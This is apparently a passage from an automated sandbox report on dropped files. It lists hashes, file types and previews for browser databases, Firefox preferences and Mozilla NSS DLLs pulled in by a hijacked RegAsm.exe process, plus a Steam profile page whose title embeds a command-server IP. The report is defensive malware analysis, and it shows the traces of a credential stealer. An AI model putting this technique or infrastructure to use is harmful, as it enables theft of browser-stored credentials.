                                                                          SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                          SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                          SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\FBFHJJ

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):98304
                                                                          Entropy (8bit):0.08235737944063153
                                                                          Encrypted:false
                                                                          SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                          MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                          SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                          SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                          SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\FBFHJJ-shm

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Reputation:high, very likely benign file
                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\FHDAFI

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 2, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):51200
                                                                          Entropy (8bit):0.8745947603342119
                                                                          Encrypted:false
                                                                          SSDEEP:96:aZ8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:W8yLG7IwRWf4
                                                                          MD5:378391FDB591852E472D99DC4BF837DA
                                                                          SHA1:10CB2CDAD4EDCCACE0A7748005F52C5251F6F0E0
                                                                          SHA-256:513C63B0E44FFDE2B4E511A69436799A8B59585CB0EB5CCFDA7A9A8F06BA4808
                                                                          SHA-512:F099631BEC265A6E8E4F8808270B57FFF28D7CBF75CC6FA046BB516E8863F36E8506C7A38AD682132FCB1134D26326A58F5B588B9EC9604F09FD7155B2AEF2DA
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\FIEHII

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:ASCII text, with very long lines (1717), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):10237
                                                                          Entropy (8bit):5.498288591230544
                                                                          Encrypted:false
                                                                          SSDEEP:192:/nTFTRRFYbBp6SLZNMGaXU6qU4rzy+/3/OYiNBw8D7Sl:LreDFNMroyrdw60
                                                                          MD5:0F58C61DE9618A1B53735181E43EE166
                                                                          SHA1:CC45931CF12AF92935A84C2A015786CC810AEC3A
                                                                          SHA-256:AE9C3109DD23F391DC58C564080932100F55C8E674176D7911D54FB0D3417AE0
                                                                          SHA-512:DEA527C22D4AA607B00FBBCC1CDD9C6B69E92EC3B1B14649A086E87258AAD5C280BFB2835C165176E8759F575AA39D1B58E25CB40F60C7E88D94243A874B71BE
                                                                          Malicious:false
                                                                          Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "a24b7aae-efcd-4433-83ad-3649b8231e2d");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696486832);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696486836);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

                                                                          C:\ProgramData\DBFCBGCGIJKJ\GHJDBA

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):40960
                                                                          Entropy (8bit):0.8553638852307782
                                                                          Encrypted:false
                                                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\HCFIJK

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                          Category:dropped
                                                                          Size (bytes):106496
                                                                          Entropy (8bit):1.136471148832945
                                                                          Encrypted:false
                                                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                          MD5:37B1FC046E4B29468721F797A2BB968D
                                                                          SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                          SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                          SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\IEHCAK

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                          Category:dropped
                                                                          Size (bytes):5242880
                                                                          Entropy (8bit):0.0357803477377646
                                                                          Encrypted:false
                                                                          SSDEEP:192:58rJQaXoMXp0VW9FxWwJU0VnQphI1mJ/8GJK:58r54w0VW3xWB0VaI4
                                                                          MD5:76D181A334D47872CD2E37135CC83F95
                                                                          SHA1:B563370B023073CE6E0F63671AA4AF169ABBF4E1
                                                                          SHA-256:52D831CC6F56C3A25EB9238AAF25348E1C4A3D361DFE7F99DB1D37D89A0057FD
                                                                          SHA-512:23E0D43E4785E5686868D5448628718720C5A8D9328EE814CB77807260F7CDA2D01C5DEE8F58B5713F4F09319E6CB7AB24725078C01322BAE04777418A49A9F7
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\IEHCAK-shm

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):32768
                                                                          Entropy (8bit):0.017262956703125623
                                                                          Encrypted:false
                                                                          SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                          MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                          SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                          SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                          SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                          Malicious:false
                                                                          Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\KEBFBG

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):155648
                                                                          Entropy (8bit):0.5407252242845243
                                                                          Encrypted:false
                                                                          SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                          MD5:7B955D976803304F2C0505431A0CF1CF
                                                                          SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                          SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                          SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......&..................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\KJKJJE

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                          Category:dropped
                                                                          Size (bytes):159744
                                                                          Entropy (8bit):0.5394293526345721
                                                                          Encrypted:false
                                                                          SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                          MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                          SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                          SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                          SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                          Malicious:false
                                                                          Preview:SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\freebl3.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: 5C8BGNPCno.exe, Detection: malicious, Browse
                                                                          • Filename: 66AF3M5zgO.exe, Detection: malicious, Browse
                                                                          • Filename: sSX92EpKXA.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: tTcrJ0HtoJ.exe, Detection: malicious, Browse
                                                                          • Filename: l2XteV3M4u.exe, Detection: malicious, Browse
                                                                          • Filename: 7067B48pY6.exe, Detection: malicious, Browse
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\mozglue.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):608080
                                                                          Entropy (8bit):6.833616094889818
                                                                          Encrypted:false
                                                                          SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                          MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                          SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                          SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                          SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Joe Sandbox View:
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: 5C8BGNPCno.exe, Detection: malicious, Browse
                                                                          • Filename: 66AF3M5zgO.exe, Detection: malicious, Browse
                                                                          • Filename: sSX92EpKXA.exe, Detection: malicious, Browse
                                                                          • Filename: file.exe, Detection: malicious, Browse
                                                                          • Filename: tTcrJ0HtoJ.exe, Detection: malicious, Browse
                                                                          • Filename: l2XteV3M4u.exe, Detection: malicious, Browse
                                                                          • Filename: 7067B48pY6.exe, Detection: malicious, Browse
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\msvcp140.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):450024
                                                                          Entropy (8bit):6.673992339875127
                                                                          Encrypted:false
                                                                          SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                          MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                          SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                          SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                          SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\nss3.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2046288
                                                                          Entropy (8bit):6.787733948558952
                                                                          Encrypted:false
                                                                          SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                          MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                          SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                          SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                          SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\softokn3.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):257872
                                                                          Entropy (8bit):6.727482641240852
                                                                          Encrypted:false
                                                                          SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                          MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                          SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                          SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                          SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\ProgramData\DBFCBGCGIJKJ\vcruntime140.dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):80880
                                                                          Entropy (8bit):6.920480786566406
                                                                          Encrypted:false
                                                                          SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                          MD5:A37EE36B536409056A86F50E67777DD7
                                                                          SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                          SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                          SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\sqls[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):2459136
                                                                          Entropy (8bit):6.052474106868353
                                                                          Encrypted:false
                                                                          SSDEEP:49152:WHoJ9zGioiMjW2RrL9B8SSpiCH7cuez9A:WHoJBGqabRnj8JY/9
                                                                          MD5:90E744829865D57082A7F452EDC90DE5
                                                                          SHA1:833B178775F39675FA4E55EAB1032353514E1052
                                                                          SHA-256:036A57102385D7F0D7B2DEACF932C1C372AE30D924365B7A88F8A26657DD7550
                                                                          SHA-512:0A2D112FF7CB806A74F5EC17FE097D28107BB497D6ED5AD28EA47E6795434BA903CDB49AAF97A9A99C08CD0411F1969CAD93031246DC107C26606A898E570323
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........7.Z.Y.Z.Y.Z.Y...Z.n.Y...\..Y...]...Y...X.Y.Y.Z.X..Y.O.\.E.Y.O.].U.Y.O.Z.L.Y.l3].[.Y.l3Y.[.Y.l3..[.Y.l3[.[.Y.RichZ.Y.................PE..L...i.`e...........!...%.. .........{D........ ...............................%...........@...........................#..6....$.(.....$.......................$.....`.#.8...........................x.#.@.............$..............................text...G. ....... ................. ..`.rdata...".... ..$.... .............@..@.data...4|... $..b....#.............@....idata........$......^$.............@..@.00cfg........$......p$.............@..@.rsrc.........$......r$.............@..@.reloc..5.....$.......$.............@..B................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\76561199689717899[1].htm

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:HTML document, Unicode text, UTF-8 text, with very long lines (3041), with CRLF, LF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):35638
                                                                          Entropy (8bit):5.381496025911681
                                                                          Encrypted:false
                                                                          SSDEEP:768:j7pqLtWYmwt5D0gqOciNGA7PzzgiJmDzJtxvrfukPco1AUmPzzgiJmDzJtxvJ2Sm:j78LtWYmwt5D0gqOcc7PzzgiJmDzJtxy
                                                                          MD5:A751191FBA24C5F431CCA2D021952D1D
                                                                          SHA1:F478B2FF9C3388CA5BC03EE2465782DD999CACC7
                                                                          SHA-256:3594B4D65F6C788A65C254B7AE427B34487790A970E32FAB79E7F93185F92C41
                                                                          SHA-512:BBBF3238A1739C359F91AF5C802E5D9D40CE616FF5B093CCDB21563B9F9DF87C3494272C366F41B8E42F81FC64F00FF3D5A16D56B7B98EFB7511A58F46FEF582
                                                                          Malicious:false
                                                                          Preview:<!DOCTYPE html>..<html class=" responsive" lang="en">..<head>...<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.....<meta name="viewport" content="width=device-width,initial-scale=1">....<meta name="theme-color" content="#171a21">....<title>Steam Community :: r0is https://78.47.123.174|</title>...<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon">...........<link href="https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=GfSjbGKcNYaQ&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=tuNiaSwXwcYT&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=E0c90DJSB6Ld&amp;l=english&amp;_cdn=cloudflare" rel="stylesheet" type="text/css" >.<link href="https://community.cloudflare.steamstatic.com/public/css/globalv2.cs

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\freebl3[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):685392
                                                                          Entropy (8bit):6.872871740790978
                                                                          Encrypted:false
                                                                          SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                          MD5:550686C0EE48C386DFCB40199BD076AC
                                                                          SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                          SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                          SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                          Malicious:false
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\mozglue[1].dll

                                                                          Download File
                                                                          Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):608080
